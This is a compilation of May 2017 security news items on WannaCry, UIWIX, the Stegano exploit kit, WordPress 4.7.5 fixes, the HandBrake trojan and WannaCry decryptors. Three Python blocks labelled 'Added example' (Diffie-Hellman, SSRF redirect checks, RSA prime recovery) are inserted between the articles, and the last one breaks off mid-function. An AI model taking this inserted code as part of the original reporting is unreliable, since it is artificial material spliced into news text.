The weekly reported on its website -- citing multiple unnamed sources -- that Disney is working with federal agents and monitoring for leaks online.

Movie website Deadline identified "Pirates of the Caribbean: Dead Men Tell No Tales," which opens on May 26, as the target, without revealing its sources, while some film writers speculated on Twitter that Pixar's "Cars 3," due for release next month, might have been hit.

Although both films are expected to do well for Disney, their profits are likely to be dwarfed by another film on the company's slate -- "Star Wars: The Last Jedi," which hits theaters on December 15.

"IMO, if it were 'Last Jedi,' he would pay in a heartbeat. But 'Pirates'... meh," Ryan Parker, a staff writer on the Hollywood Reporter, speculated on Twitter.

The cyber-thieves demanded to be paid in online currency Bitcoin and are threatening to release five minutes of the movie, followed by 20-minute segments until the ransom is delivered.

The hack follows a recent cyber attack on internet streamer Netflix that led to 10 episodes of "Orange is the New Black" being leaked ahead of release.

"Dead Men Tell No Tales" is the fifth in the "Pirates of the Caribbean" series, which stars Johnny Depp and has taken $3.7 billion at the box office since 2003.

Sci-fi novelist Paul Tassi, who comments on technology and the internet for Forbes Magazine, said "Pirates" would be unlikely to suffer were it the target, since its release date is so near.

"Yes, going to a movie in theaters is one of the more exhausting media experiences still left in society, but the kinds of people who are willing to pay money to see Johnny Depp stumble his way through a fifth 'Pirates of the Caribbean' movie in theaters are probably not the type to download a stolen copy of it right before it comes out," he said.

"And like all movies, 'Pirates' would appear on torrent sites regardless practically the day of its release, so the hackers seem to be really over-estimating their impact here."

More than 200,000 computers in 150 countries were hit by a ransomware cyberattack, described as the largest-ever of its kind, over the weekend.

Since Friday, banks, hospitals and government agencies have been among a variety of targets for hackers exploiting vulnerabilities in older Microsoft computer operating systems.

Microsoft president Brad Smith said the US National Security Agency had developed the code used in the attack.

The Walt Disney Company didn't respond to requests for comment.


Fileless Ransomware Spreads via EternalBlue Exploit

20.5.2017 securityweek Ransomware
A newly discovered ransomware family was found to be using the NSA-linked EternalBlue exploit for distribution and is capable of fileless infection, researchers have discovered.

Dubbed UIWIX, the malware was initially spotted on Monday, when the WannaCry outbreak was in the spotlight. The threat spreads by exploiting the same vulnerability in Windows SMBv1 and SMBv2 that WannaCry does.

Unlike WannaCry, UIWIX is executed in memory after exploiting EternalBlue, with no files or components being written to disk. This “greatly reduces its footprint and in turn makes detection trickier,” Trend Micro explains.

Furthermore, the security researchers say this ransomware family is also stealthier, containing code that allows it to terminate itself if a virtual machine (VM) or sandbox is detected. UIWIX also contains code that gathers the infected system’s browser login, File Transfer Protocol (FTP), email, and messenger credentials.

Unlike WannaCry, UIWIX doesn’t use autostart and persistence mechanisms, and is distributed in the form of a Dynamic-link Library (DLL). Interestingly, the malware terminates itself if the compromised computer is located in Russia, Kazakhstan, or Belarus, and uses mini-tor.dll to connect to an .onion site.

UIWIX doesn’t have the worm spreading capabilities either, doesn’t include a kill-switch, and uses a different Bitcoin address for each victim it infects. When accessed, a URL in the ransom note asks for a “personal code” that is included in the ransom note and prompts the user to sign up for a Bitcoin wallet if they don’t have one.

“It’s not a surprise that WannaCry’s massive impact turned the attention of other cybercriminals into using the same attack surface vulnerable systems and networks are exposed to,” Trend Micro notes.

Before WannaCry and UIWIX, however, the EternalBlue exploit was leveraged by the Adylkuzz botnet, which abuses infected systems to mine for the cryptocurrency Monero.

Already ported to Metasploit, EternalBlue is one of the exploits released by the hacker group known as The Shadow Brokers after allegedly stealing it from the National Security Agency-linked Equation Group. Microsoft patched the targeted vulnerability before the exploit’s public release, and also issued an emergency patch for older platform versions.

“UIWIX, like many other threats that exploit security gaps, is a lesson on the real-life significance of patching. Enterprises must balance how it sustains the efficiency of [their] business operations while also safeguarding them. IT/system administrators and information security professionals, their sentry, should enforce strong baselines that can mitigate attacks that threaten the integrity and security of their systems and networks,” Trend Micro concludes.


Financial Firms Struggle on Compliance for non-Email Communications

20.5.2017 securityweek Security
Financial services is perhaps the most regulated sector in industry. SEC, FINRA and Gramm-Leach-Bliley are merely the better known of a raft of regulations. Key to all of them is the requirement to manage and retain communications. But just as regulations tend to increase and become more complex, so too have the different methods of communication that need to be monitored ballooned. What was once just email now includes SMS, public IM, a variety of social media and more. At the same time, regulators are becoming more active.

The 2017 Electronic Communications Compliance Survey (PDF) from Smarsh demonstrates continuing industry concern over its ability to capture and retain relevant staff communications, especially from mobile devices. Interestingly, Europe's GDPR will add to the regulation mix, but will expand the industry coverage from finserv to any organization doing business with Europe. While finserv regulations are concerned with financial data in communications, GDPR is concerned with personal data in communications. Different detail, but same basic problem: the control of regulated data getting dispersed in uncontrolled communications.

The problem is the same. So it follows that the difficulties and concerns voiced by finserv organizations over communications compliance will apply to all industry sectors by the end of May 2018.

Smarsh surveyed 119 finserv individuals in compliance supervisory roles ranging from c-level to operations. It found that the top three concerns for regulatory compliance are non-email communications, mobile devices, and simply understanding new and challenging regulations. In each case, the level of concern has increased dramatically over 2016 levels.

Non-email and mobile device communications overlap. Employees are increasingly using personal devices for non-email quick communication with customers, potential customers, colleagues and friends. Text/SMS messaging is considered to pose the greatest compliance risk (52% of respondents). Noticeably, in December 2016 FINRA fined a Georgia firm $1.5 million partly for failure to retain approximately one million text messages sent using firm-issued devices.

All of this is against a backdrop of more frequent, deeper and broader regulatory examinations. In 2015, 27% of firms were examined in a 12-month period; in 2016 it was 42%; and in 2017 it rose to 47%. The biggest single change in the examinations has been the regulators' increasing requests for social media communications. In 2015, 19% of examiners requested social media comms -- but by 2017, this had increased to 44% for LinkedIn, 27% for Facebook, 21% for Twitter, and 6% for Instagram.

The examiners are also looking at firms' mobile communication policies. In the last year, 21% of the examined respondents had to provide their mobile device communications policy. Policy, however, has its own issues. Of those firms that allow text/SMS messaging, 36% do not have a written policy governing its use. Smarsh suggests, however, that any firm not supervising mobile use should now expect to be fined.

The problem for business is that mobile communications is not a risk that can be avoided. "Firms need to leverage new and emerging channels to communicate with their customers and stay competitive, but they're failing to manage the risk," explains Stephen Marsh, CEO and founder of Smarsh.

Simple prohibition is not a solution. Where it is used, survey respondents' confidence in its effectiveness is low. Asked if they would be able to prove that prohibition is working, the confidence gap over text/SMS, and also LinkedIn, stands at 67%. For Twitter it is 57%, and for public IM it is 55%.

"This year's survey," comments CEO Stephen Marsh, "reinforces that policies of prohibition are a barrier to growing business and workforce productivity. They do not deliver compliance confidence, and they simply don't work. Early 2017 examples of text-related firm penalties all have one thing in common: all prohibited its use for business communication. More than two thirds (67 percent) of respondents have no or minimal confidence that they could prove their prohibition of text messaging is actually working."

There is a bonus. While compliance is the primary driver for communications archiving and supervision, 88% of the respondents recognize that communications data can also help identify more general security risks to the organization. "More than half of respondents (59%)," notes the report, "confirm that their organization uses this data to identify fraudulent activity, among other purposes, such as supporting e-discovery and HR issues, and detecting market abuse."

It is worth stressing that the 2017 Smarsh survey relates directly to compliance in the financial services industry. The arrival of the General Data Protection Regulation in May 2018 will create the same basic communications content compliance requirements across all industries. In preparing for GDPR, all industry sectors can learn from the non-email communications compliance problems already being experienced by Finserv.


Number of Phishing Sites Using HTTPS Soars

19.5.2017 securityweek Phishing
The number of phishing websites using HTTPS has increased considerably over the past few months since Firefox and Chrome have started warning users when they access login pages that are not secure.

Internet security services firm Netcraft reported on Wednesday that, since late January, the proportion of phishing sites using HTTPS increased from roughly 5% to 15%.

One explanation for the rise is that, in late January, both Google and Mozilla implemented HTTP warnings in their Chrome and Firefox web browsers in an effort to protect their customers against man-in-the-middle (MitM) attacks.

Users of Chrome 56 and later, and Firefox 51 and later are warned when they are about to enter their credentials on a login page that does not use HTTPS. Since most phishing sites had been served over HTTP connections, cybercriminals may have realized that they need to step up their game and move to HTTPS.

“If the new browser behaviour has driven this change — and the timing suggests it might have — then it may have also had the unintended side effect of increasing the efficacy of some phishing sites,” explained Netcraft’s Paul Mutton. “Phishing sites that now use HTTPS and valid third-party certificates can appear more legitimate, and therefore increase the likelihood of snaring a victim.”


Another possible explanation, according to the expert, is that the warnings introduced by Google and Mozilla encouraged website administrators to migrate to HTTPS. Since phishing pages are often hosted on legitimate sites that have been compromised, this may have also been a factor in the significant increase of phishing sites using HTTPS.

On the other hand, Mutton pointed out that some popular browsers, such as Microsoft’s Edge and Internet Explorer, don’t display any warnings for login pages served over HTTP, which means phishing sites served over HTTP will still be effective in many cases.

Cybercriminals have been coming up with clever ways to phish users’ credentials. One recent campaign aimed at Google customers leveraged a fake Google Docs application. Google quickly killed the operation, but the incident showed that malicious actors continue to improve their methods.


Medical Devices Infected With WannaCry Ransomware

19.5.2017 securityweek Ransomware

Several medical device manufacturers released security advisories this week following reports that the notorious WannaCry ransomware has infected some medical devices.

The WannaCry ransomware, also known as Wanna Decryptor, WanaCrypt0r, WannaCrypt, Wana Decrypt0r and WCry, leverages a couple of exploits allegedly developed by the NSA and leaked recently by a hacker group called Shadow Brokers. The threat has hit hundreds of thousands of systems worldwide, including ones housed by banks, hospitals, ISPs, government agencies, transportation companies and manufacturing plants.

Britain’s National Health Service (NHS) was among the worst hit by the malicious campaign, and the incident clearly showed the risk posed by WannaCry to healthcare organizations. However, initial reports suggested that the malware had mainly affected management systems.

The U.S.-based Health Information Trust Alliance (HITRUST) later reported seeing evidence of Bayer (Medrad), Siemens and other medical devices getting infected with WannaCry. Bayer confirmed for Forbes that two of its customers in the United States had informed it about ransomware infections.

Since many medical devices run on Windows and they are connected to the local network, they can easily get infected with WannaCry.

ICS-CERT has provided a list of vendors that have released security advisories to warn customers of the risks and provide them with recommendations on how to prevent attacks.

The list includes Rockwell Automation, BD (Becton, Dickinson and Company), Schneider Electric, ABB, Siemens, General Electric, Philips, Smiths Medical, Johnson & Johnson, and Medtronic. Some of these vendors have also issued warnings about the threat posed to their industrial products.


BD has published a list of tens of potentially vulnerable devices and provided recommendations for securing Windows-based systems. Siemens has released separate advisories for each affected Healthineers product, including magnetic resonance, laboratory diagnostics, tomography, radiography, X-ray, mammography, molecular diagnostics, and molecular imaging devices.

Siemens says it’s working on updates that will patch Server Message Block (SMB) vulnerabilities in affected products, and shared some countermeasures until fixes become available. WannaCry exploits one particular SMB vulnerability patched by Microsoft in March, but the fix for this flaw also addresses several other SMB weaknesses.

Other medical device vendors have not listed affected products, but warned customers that all Windows-based systems are at risk. Some highlighted that they had not been aware of any incidents involving their products.

“The WannaCry medical device infections show that data isn’t the only digital asset being targeted. They further demonstrate that if these devices can be impacted, so too can mission-critical infrastructures, industrial IoT devices and control systems. When one of these targets falls prey to ransomware, the outcome could be catastrophic — measured in terms of human injury and lives as opposed to just a few bitcoins,” said Dean Weber, CTO of industrial IoT security provider Mocana.

“IT, OT and security professionals in hospitals and other mission critical environments should act immediately to patch systems, especially those running Windows. They should also consider taking proactive steps that could include adding multi-factor authentication, stronger encryption and embedding security directly into devices to establish more effective trust,” Weber concluded.


Stegano Exploit Kit Adopts the Diffie-Hellman Algorithm

19.5.2017 securityweek Exploit
After receiving multiple updates, the Stegano exploit kit (EK) recently adopted the Diffie-Hellman algorithm to hinder analysis, Trend Micro security researchers warn.

Also known as Astrum, Stegano was previously associated with a massive AdGholas malvertising campaign that delivered Trojans such as Gozi and RAMNIT. The EK was also seen being used in the Seamless malvertising campaign, which normally employs RIG instead.

In late March, Proofpoint security researcher Kafeine discovered the EK abusing CVE-2017-0022, an information disclosure vulnerability in Windows that was patched on March 14. The exploit was used to look for antivirus apps on the system to evade detection and analysis.

In April, the threat received an update that prevents security researchers from replaying the malicious network traffic. The feature abuses the Diffie-Hellman key exchange algorithm, which is widely used in securing network protocols.

“Implementing the Diffie-Hellman key exchange prevents malware analysts and security researchers from getting a hold of the secret key Astrum uses to encrypt and decrypt their payloads. Consequently, obtaining the original payload by solely capturing its network traffic can be very difficult,” Trend Micro notes.
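Why a Diffie-Hellman exchange defeats replay-based analysis, as an added example that is not Trend Micro's code nor anything from the exploit kit: two parties agree on a key from public values only, and the network capture holds just the group parameters, the two public values and the ciphertext. The group parameters, the toy stream cipher and the brute-force observer are all assumptions made for the demonstration; a real deployment would use a standardized group and an authenticated cipher.

```python
"""Added example (not Trend Micro's or the exploit kit's code): a textbook
Diffie-Hellman exchange as seen by a passive observer of the traffic."""
import hashlib
import secrets


def dh_keypair(p, g, priv=None):
    """Return (private exponent, public value g^priv mod p).

    A fixed `priv` is accepted so an exchange can be replayed deterministically
    in tests; production code always draws it from a CSPRNG.
    """
    if priv is None:
        priv = 2 + secrets.randbelow(p - 3)  # 2 <= priv <= p - 2
    return priv, pow(g, priv, p)


def dh_shared_secret(p, their_pub, my_priv):
    """Shared secret: (g^b)^a == (g^a)^b mod p."""
    return pow(their_pub, my_priv, p)


def derive_key(shared, p):
    """Hash the shared secret into a 32-byte symmetric key."""
    nbytes = (p.bit_length() + 7) // 8
    return hashlib.sha256(shared.to_bytes(nbytes, "big")).digest()


def keystream_xor(key, data):
    """Toy stream cipher (SHA-256 in counter mode), for illustration only."""
    stream = b""
    counter = 0
    while len(stream) < len(data):
        stream += hashlib.sha256(key + counter.to_bytes(4, "big")).digest()
        counter += 1
    return bytes(a ^ b for a, b in zip(data, stream))


def run_exchange(p, g, payload, priv_a=None, priv_b=None):
    """Server (a) and client (b) agree on a key; the payload travels encrypted.

    Returns both sides' derived keys plus exactly what a network capture holds:
    the group parameters, the two public values and the ciphertext.
    """
    a, pub_a = dh_keypair(p, g, priv_a)
    b, pub_b = dh_keypair(p, g, priv_b)
    key_a = derive_key(dh_shared_secret(p, pub_b, a), p)
    key_b = derive_key(dh_shared_secret(p, pub_a, b), p)
    capture = {"p": p, "g": g, "A": pub_a, "B": pub_b,
               "ciphertext": keystream_xor(key_a, payload)}
    return key_a, key_b, capture


def observer_recover(capture, max_tries):
    """What an analyst holding only the capture can do: solve the discrete
    logarithm A = g^a mod p. Brute force is the only generic attack shown
    here; it succeeds on the toy group and runs out of budget on a large one.
    Returns the decrypted payload, or None when the budget is exhausted."""
    p, g = capture["p"], capture["g"]
    x = 1
    for guess in range(1, max_tries + 1):
        x = (x * g) % p  # x == g^guess mod p
        if x == capture["A"]:
            key = derive_key(pow(capture["B"], guess, p), p)
            return keystream_xor(key, capture["ciphertext"])
    return None


if __name__ == "__main__":
    # Toy group (p = 23, g = 5): the observer recovers the payload instantly.
    _, _, small = run_exchange(23, 5, b"payload", priv_a=6, priv_b=15)
    print(observer_recover(small, 1000))
    # Mersenne prime 2^127 - 1 with large exponents: the same search fails.
    _, _, big = run_exchange(2**127 - 1, 5, b"payload",
                             priv_a=2**100 + 12345, priv_b=2**101 + 777)
    print(observer_recover(big, 20000))
```

The point for a defender is that once the exchange is ephemeral, a passive capture of the landing page traffic no longer yields the decrypted payload; analysis has to move to the endpoint (a browser hook or memory capture of the running exploit) or to a live interaction that controls one side's private exponent.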

In addition to the CVE-2017-0022 flaw, Astrum/Stegano is using exploits for a series of vulnerabilities in Adobe Flash, including CVE-2015-8651 (a code execution vulnerability patched December 28, 2015), CVE-2016-1019 (a remote code execution flaw patched April 7, 2016), and CVE-2016-4117 (an out-of-bound read bug in Flash patched May 10, 2016).

At the moment, the EK isn’t distributing established malware and its traffic is very low, which Trend Micro believes could be dry runs for future attacks.

“It wouldn’t be a surprise if [Astrum/Stegano’s] operators turn it into an exclusive tool of the trade—like Magnitude and Neutrino did—or go beyond leveraging security flaws in Adobe Flash. Emulating capabilities from its predecessors such as fileless infections that can fingerprint its targets and deliver encrypted payloads shouldn’t be far off,” the researchers note.


WordPress 4.7.5 release addresses six security vulnerabilities
19.5.2017 securityaffairs Vulnerebility

The new WordPress 4.7.5 release fixes six security vulnerabilities affecting version 4.7.4 and earlier, including XSS, CSRF, SSRF flaws.
The WordPress 4.7.5 release patches six vulnerabilities affecting version 4.7.4 and earlier. The latest version addresses cross-site scripting (XSS), cross-site request forgery (CSRF), and server-side request forgery (SSRF) flaws.

Below is the list of the security issues fixed with the latest update:

Insufficient redirect validation in the HTTP class. Reported by Ronni Skansing.
Improper handling of post meta data values in the XML-RPC API. Reported by Sam Thomas.
Lack of capability checks for post meta data in the XML-RPC API. Reported by Ben Bidner of the WordPress Security Team.
A Cross Site Request Forgery (CSRF) vulnerability was discovered in the filesystem credentials dialog. Reported by Yorick Koster.
A cross-site scripting (XSS) vulnerability was discovered when attempting to upload very large files. Reported by Ronni Skansing.
A cross-site scripting (XSS) vulnerability was discovered related to the Customizer. Reported by Weston Ruter of the WordPress Security Team.
Let’s go into the details of the flaws fixed by the WordPress 4.7.5 release:

The CSRF flaw patched was reported by the Securify researcher Yorick Koster in the summer of 2016 during the WordPress hacking competition.

It affects WordPress version 4.5.3 up to and including version 4.7.4.

“The FTP/SSH form functionality of WordPress was found to be vulnerable to Cross-Site Request Forgery,” states the advisory published by the company. “This vulnerability can be used to overwrite the FTP or SSH connection settings of the affected WordPress site. An attacker can use this issue to trick an Administrator into logging into the attacker’s FTP or SSH server, disclosing his/her login credentials to the attacker. In order to exploit this vulnerability, the attacker has to lure/force a logged on WordPress Administrator into opening a malicious website.”

The SSRF vulnerability, tracked as CVE-2017-9066, was discovered by the researcher Ronni Skansing, who plans to release a PoC code soon.

Ryan St. Germain @r_stgermain: @skansing Any POC availability?
Ronni Skansing @skansing: @r_stgermain It will be available at https://hackerone.com/reports/187520 when the report has been fully processed by wp staff, I can request disclosure on the report
2:53 AM - 19 May 2017
Skansing also reported another vulnerability in WordPress, an XSS flaw related to uploading very large files.

This isn’t the only XSS vulnerability fixed; another cross-site scripting flaw, in the Customizer feature, was reported by Weston Ruter of the WordPress security team.

The WordPress 4.7.5 release also patches vulnerabilities in the XML-RPC API, such as the lack of capability checks for post meta data and the improper handling of post meta data values.
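The redirect-validation item in the list above is the kind of check that stops a server-side HTTP client from being bounced onto internal hosts. The following is an added example, not WordPress code, and it assumes (as the matching reporter credit suggests, though the page does not say so outright) that the SSRF is the redirect-validation issue. The resolver and fetch callables are injected so it runs offline; the allowed schemes and ports are assumptions a site would tune.

```python
"""Added example (not WordPress code): validate every hop of an HTTP redirect
chain so a server-side fetch cannot be redirected onto internal addresses."""
import ipaddress
import socket
from urllib.parse import urljoin, urlparse

ALLOWED_SCHEMES = {"http", "https"}
ALLOWED_PORTS = {None, 80, 443}   # None means the scheme's default port
MAX_REDIRECTS = 5
REDIRECT_STATUSES = {301, 302, 303, 307, 308}


def is_public_address(ip_text):
    """True only for globally routable unicast addresses."""
    ip = ipaddress.ip_address(ip_text)
    return not (ip.is_private or ip.is_loopback or ip.is_link_local
                or ip.is_multicast or ip.is_reserved or ip.is_unspecified)


def validate_redirect_target(base_url, location, resolver=socket.gethostbyname):
    """Resolve `location` against `base_url`; return the absolute URL, or
    raise ValueError if the hop must not be followed.

    `resolver` maps a host name to an IP string; it is a parameter so tests
    can supply a fake and callers can plug in a pinning resolver.
    """
    target = urljoin(base_url, location)
    parts = urlparse(target)
    scheme = parts.scheme.lower()
    if scheme not in ALLOWED_SCHEMES:
        raise ValueError(f"scheme not allowed: {scheme!r}")
    if not parts.hostname:
        raise ValueError("redirect target has no host")
    if parts.username is not None or parts.password is not None:
        raise ValueError("user info in redirect target")
    if parts.port not in ALLOWED_PORTS:
        raise ValueError(f"port not allowed: {parts.port}")
    try:
        ip_text = resolver(parts.hostname)   # IP literals resolve to themselves
    except OSError as exc:
        raise ValueError(f"cannot resolve {parts.hostname!r}: {exc}") from exc
    if not is_public_address(ip_text):
        raise ValueError(f"{parts.hostname!r} resolves to {ip_text}, not public")
    return target


def is_safe_redirect(base_url, location, resolver=socket.gethostbyname):
    """Boolean wrapper around validate_redirect_target."""
    try:
        validate_redirect_target(base_url, location, resolver)
        return True
    except ValueError:
        return False


def follow_redirects(url, fetch, resolver=socket.gethostbyname,
                     max_redirects=MAX_REDIRECTS):
    """Fetch `url`, following up to `max_redirects` hops and validating each
    one (the weak pattern is validating only the first URL).

    `fetch(url)` must return (status_code, headers_dict, body); it is injected
    so this runs offline. Returns (final_url, status_code, body).
    """
    url = validate_redirect_target(url, url, resolver)
    for _ in range(max_redirects + 1):
        status, headers, body = fetch(url)
        if status not in REDIRECT_STATUSES:
            return url, status, body
        location = headers.get("Location")
        if not location:
            raise ValueError("redirect response without Location header")
        url = validate_redirect_target(url, location, resolver)
    raise ValueError(f"more than {max_redirects} redirects")
```

One caveat a reviewer would raise: resolving the name for the check and then letting the HTTP library resolve it again for the connection leaves a window for DNS rebinding. A hardened client connects to the address it validated (or re-validates inside the connection hook) rather than trusting a second lookup.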

WordPress also announced the launch of a public bug bounty program that aims to involve the hacking community in testing the WordPress CMS, BuddyPress, bbPress and GlotPress.

The program will also cover the WordPress.org, WordCamp.org, BuddyPress.org, WordPress.tv, bbPress.org and Jobs.WordPress.net websites.


Code Stolen After Developer Installed Trojanized App

19.5.2017 Securityweek Virus

In a perfect example of how a breach could have an unexpected impact, application builder Panic on Wednesday announced that it experienced source code theft after a developer unknowingly installed a Trojanized application in early May.

The specific app was HandBrake, a video converting tool that experienced a breach in early May, when one of its download mirror servers was compromised and configured to distribute a remote administration Trojan (RAT) for Mac computers.

After discovering the incident, HandBrake posted a security alert on its website, informing users that those who downloaded the application between May 2 and May 6 might have been infected. Only the download mirror at download.handbrake.fr had been compromised, but all users were advised to verify their installation.

One of those who downloaded the Trojanized HandBrake variant was Steven Frank, the founder of Panic, a company that creates software for Macs, iPhones, and iPads. Through the infected machine, attackers gained access to some of the company’s source code repositories and cloned them.

After investigating the incident, Panic discovered that the method the attackers used to clone the source code prevented them from stealing all of the repositories.

The developers also received an email from the attackers, who informed them they would release the source code online if a large Bitcoin ransom wasn’t paid. The company, however, decided against paying, as this wouldn’t guarantee the attackers would keep their end of the bargain.

“This hack hasn’t slowed us down. That source is already missing a ton of fixes and improvements we committed over the last week alone, and six months from now it will be missing major critical new features. In short: it’s old and getting older,” Frank says.

Immediately after discovering the hack, Panic contacted Apple and the FBI, and the former has even helped them roll their Developer ID and invalidate the old one, although it wasn’t believed to have been compromised.

Furthermore, the company notes that it has no indication that customer information was accessed in the hack, nor any indication that Panic Sync (a “secure service to keep your Panic data in sync across all your apps and devices”) data was accessed. The company’s web server wasn’t compromised either, it seems.

“As soon as I discovered the infection on my Mac, I disabled it, took the Mac out of commission, and we began the incredibly lengthy process of changing all of my passwords, rotating the relevant secret keys throughout our infrastructure, and so on, to re-lock our doors and hopefully prevent anything else from being stolen,” Frank explains.

This incident shows that repackaged versions of legitimate apps can fly under the radar and cause significant damage, especially if the user doesn’t pay attention to the permissions requested during the installation process.

“So, I managed to download within the three day window during which the infection was unknown, managed to hit the one download mirror that was compromised, managed to run it and breeze right through an in-retrospect-sketchy authentication dialog, without stopping to wonder why HandBrake would need admin privileges, or why it would suddenly need them when it hadn’t before. I also likely bypassed the Gatekeeper warning without even thinking about it, because I run a handful of apps that are still not signed by their developers. And that was that, my Mac was completely, entirely compromised in 3 seconds or less,” Frank notes.


Microsoft Withheld Update That Could Have Slowed WannaCry: Report

19.5.2017 Securityweek Ransomware

American software giant Microsoft held back from distributing a free security update that could have protected computers from the WannaCry global cyber attack, the Financial Times reported Thursday.

In mid-March, Microsoft distributed a security update after it detected the security flaw in its XP operating system that enabled the so-called WannaCry ransomware to infiltrate and freeze computers last week.

But the software giant only sent the free security update -- or patch -- to users of the most recent version of the Windows 10 operating system, the report said.

Users of older software, such as Windows XP, had to pay hefty fees for technical support, it added.

"The high price highlights the quandary the world's biggest software company faces as it tries to force customers to move to newer and more secure software," it said.

A Microsoft spokesperson based in the United States told AFP: "Microsoft offers custom support agreements as a stopgap measure" for companies that choose not to upgrade their systems.

"To be clear, Microsoft would prefer that companies upgrade and realise the full benefits of the latest version rather than choose custom support."

According to the FT, the cost of updating older Windows versions "went from $200 per device in 2014, when regular support for XP ended, to $400 the following year," while some clients were asked to pay heftier fees.

The newspaper argued the high costs led Britain's National Health Service -- one of the first victims of the WannaCry attack -- to not proceed with updates.

Microsoft ended up distributing the free patch for the older versions on Friday -- the day the ransomware was detected.

The announcement, however, came "too late to contain the WannaCry outbreak," the report said.

Microsoft did not confirm to AFP when it made the patch free.

A hacking group called Shadow Brokers released the malware in April claiming to have discovered the flaw from the NSA, according to Kaspersky Lab, a Russian cybersecurity provider.


Wanadecrypt allows recovery of files from Windows XP PCs infected by WannaCry without paying the ransom
19.5.2017 Securityweek Ransomware

A security researcher developed a tool called wanadecrypt to restore encrypted files from Windows XP PCs infected by the WannaCry ransomware.
The WannaCry ransomware made the headlines with the massive attack that hit systems worldwide during the weekend.

The malicious code infected more than 200,000 computers across 150 countries in a matter of hours; it leverages the Windows SMB exploit EternalBlue to compromise unpatched systems or computers running unsupported versions of Windows.

Microsoft took the unprecedented decision to issue security patches for Windows 2003 server and XP in order to protect its customers.

Now there is good news for owners of some Windows XP computers infected by the WannaCry ransomware: they may be able to decrypt their data without paying the ransom ($300 to $600).


The Quarkslab researcher Adrien Guinet has published a tool, called Wanadecrypt, that he used to recover the decryption key required to restore the files on an infected XP computer. The expert successfully tested Wanadecrypt on a small number of infected XP computers, but it is not clear whether the technique works on every PC.

Experts downplayed the discovery because Windows XP computers weren’t affected by the massive WannaCry attack. Still, Guinet’s method could be helpful to XP users hit in other attacks.


Adrien Guinet @adriengnt: I got to finish the full decryption process, but I confirm that, in this case, the private key can be recovered on an XP system #wannacry!!
1:34 PM - 18 May 2017
“This software has only been tested and known to work under Windows XP,” he wrote in a readme note issued with the software. “In order to work, your computer must not have been rebooted after being infected. Please also note that you need some luck for this to work (see below), and so it might not work in every case!”

Another popular expert, Matt Suiche, reported he was not able to use the WannaKey tool.

Matthieu Suiche @msuiche: @adriengnt @gentilkiwi Do you support the same format yet Adrien ? Trying now.
Matthieu Suiche @msuiche: @adriengnt @gentilkiwi Missing something ? pic.twitter.com/9Fe12WzmrQ
7:08 PM - 18 May 2017
The WannaCry ransomware uses the Microsoft Cryptographic Application Programming Interface (CryptoAPI) included with Windows to implement most of its encryption features.

Once the key has been created, the API erases it from memory on most versions of Windows, but experts discovered that a limitation of Windows XP can prevent this from happening.

This implies that the prime numbers used in the WannaCry key generation may remain in the memory of the machine until it is powered down, allowing Wanadecrypt to extract them from the infected XP system.

“If you are lucky (that is the associated memory hasn’t been reallocated and erased), these prime numbers might still be in memory,” Guinet wrote.

Anyone infected by WannaCry who wants to try to decrypt the files should avoid restarting their XP computer; the researcher is now working to extend his findings to other operating systems.


WannaCry Ransomware Decryption Tool Released; Unlock Files Without Paying Ransom
19.5.2017 Securityaffairs Ransomware

If your PC has been infected by WannaCry – the ransomware that wreaked havoc across the world last Friday – you might be lucky to get your locked files back without paying the ransom of $300 to the cyber criminals.
Adrien Guinet, a French security researcher from Quarkslab, has discovered a way to retrieve the secret encryption keys used by the WannaCry ransomware for free, which works on Windows XP, Windows 7, Windows Vista, Windows Server 2003 and 2008 operating systems.
WannaCry Ransomware Decryption Keys
WannaCry's encryption scheme works by generating a pair of keys on the victim's computer that rely on prime numbers: a "public" key and a "private" key, for encrypting and decrypting the system’s files respectively.
To prevent the victim from accessing the private key and decrypting locked files himself, WannaCry erases the key from the system, leaving the victim no way to retrieve the decryption key except paying the ransom to the attacker.
But here's the kicker: WannaCry "does not erase the prime numbers from memory before freeing the associated memory," says Guinet.
Based on this finding, Guinet released a WannaCry ransomware decryption tool, named WannaKey, that basically tries to retrieve from memory the two prime numbers used to generate the encryption keys.
However, this method comes with some limitations and will work only if:
The affected computer has not been rebooted after being infected.
The associated memory has not been allocated and erased by some other process.
"In order to work, your computer must not have been rebooted after being infected. Please also note that you need some luck for this to work (see below), and so it might not work in every case!," Guinet says.
Since WannaKey only pulls the prime numbers from the memory of the affected computer, it can only be used by those able to turn those primes into the decryption key themselves and decrypt their WannaCry-infected PC’s files.
WanaKiwi: WannaCry Ransomware Decryption Tool


Good news is that another security researcher, Benjamin Delpy, developed an easy-to-use tool called "WanaKiwi," based on Guinet's finding, which simplifies the whole process of the WannaCry-infected file decryption.
All victims have to do is download the WanaKiwi tool from GitHub and run it on their affected Windows computer from the command line (cmd).
WanaKiwi works on Windows XP, Windows 7, Windows Vista, Windows Server 2003 and 2008, confirmed Matt Suiche from security firm Comae Technologies, who has also provided some demonstrations showing how to use WanaKiwi to decrypt your files.
Although the tool won't work for every user because of the conditions it depends on, it still gives WannaCry's victims some hope of getting their locked files back for free, even on Windows XP, the aging, largely unsupported version of Microsoft's operating system.
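The prime-recovery idea behind Wanadecrypt/WannaKey and WanaKiwi, described in this article and the previous one, as an added example that is not code from Guinet's or Delpy's tools: an RSA public modulus n is the product of two primes, so a window of process memory that divides n is one of them, and from one prime the private exponent follows. Key sizes, the little-endian layout of the prime in the constructed "heap" image, and the per-file symmetric key protected by RSA are all assumptions made for the demonstration; the articles do not describe the malware's key sizes or file format.

```python
"""Added example (not wanakey or wanakiwi code): rebuilding an RSA private key
from a prime left behind in process memory. Keys are short so it runs in
seconds; the arithmetic is the same at real sizes."""
import secrets

SMALL_PRIMES = (2, 3, 5, 7, 11, 13, 17, 19, 23, 29, 31, 37)


def is_probable_prime(n, rounds=32):
    """Miller-Rabin with `rounds` random bases."""
    if n < 2:
        return False
    for sp in SMALL_PRIMES:
        if n % sp == 0:
            return n == sp
    d, r = n - 1, 0
    while d % 2 == 0:
        d //= 2
        r += 1
    for _ in range(rounds):
        a = 2 + secrets.randbelow(n - 3)
        x = pow(a, d, n)
        if x in (1, n - 1):
            continue
        for _ in range(r - 1):
            x = pow(x, 2, n)
            if x == n - 1:
                break
        else:
            return False
    return True


def random_prime(bits):
    """Random prime with exactly `bits` bits (top bit set, odd)."""
    while True:
        cand = secrets.randbits(bits) | (1 << (bits - 1)) | 1
        if is_probable_prime(cand):
            return cand


def generate_rsa(bits=512, e=65537):
    """Textbook RSA key (no padding): returns n, e, d and the two primes."""
    half = bits // 2
    while True:
        p, q = random_prime(half), random_prime(half)
        if p != q and (p - 1) % e and (q - 1) % e:  # e prime => gcd(e, phi) == 1
            break
    n = p * q
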